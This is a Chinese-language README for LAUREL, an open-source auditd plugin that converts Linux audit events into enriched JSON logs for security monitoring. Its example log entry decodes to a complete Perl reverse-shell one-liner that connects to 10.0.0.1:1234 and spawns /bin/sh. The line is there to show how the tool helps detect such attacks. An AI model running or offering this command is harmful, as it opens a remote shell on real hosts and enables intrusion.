threathunters-io/laurel

 # Linux Audit – 实用、健壮、轻松的日志记录 [](https://github.com/threathunters-io/laurel/actions/workflows/build.yml) LAUREL 是一个用于 _auditd(8)_ 的事件后处理插件，可生成实用、丰富且基于 JSON 的审计日志，适用于现代安全监控设置。 与最新稳定版相对应的文档可以在[此处](https://github.com/threathunters-io/laurel/tree/v0.7.3)找到。 ## 为什么？ TLDR: 相比于像下面这样的审计事件…… ``` type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742… ``` ……_LAUREL_ 会将它们转换为 JSON 日志，攻击者/渗透测试人员/红队成员试图制造的混乱在其中一目了然： ``` { … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …} ``` 这发生在数据源头，因为 _LAUREL_ 运行在生成审计事件的主机上。事件中会丰富包含有关父进程 (ppid) 的有用信息： ``` "PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631} ``` ## 文档 配置和操作细节在 [laurel(8)](man/laurel.8.md) 手册页中进行了描述。 有关日志格式和基本原理的详细信息可以在 [laurel-about(7)](man/laurel-about.7.md) 手册页中找到。[laurel-audit-rules(7)](man/laurel-audit-rules.7.md) 页面包含了配置审计规则的建议和示例，这些规则有助于检测攻击者的战术。 [_LAUREL_ 安装说明](INSTALL.md) 包含了有关如何从源代码构建 _LAUREL_ 以及如何安装和配置它的说明。 我们开发 _LAUREL_ 是因为我们对现有项目和产品的功能集和性能特征不满意。详情请参阅 [性能](performance.md) 文档。 ## 另请参阅 - [ansible-auditd-laurel](https://github.com/certeu/ansible-auditd-laurel/)，由 @0xFustang / CERT-EU 提供的用于部署 _auditd_ + _laurel_ 的 Ansible role ## 许可证 GNU General Public License, version 3 ## 作者 - Hilko Bengen <> - Sergej Schmidt <> Logo 由 Birgit Meyer <> 设计。

标签：auditd, Homebrew安装, JSON日志, Linux审计, 事件后处理, 可视化界面, 安全日志分析, 日志富化, 日志转换, 构建工具, 网络安全, 通知系统, 隐私保护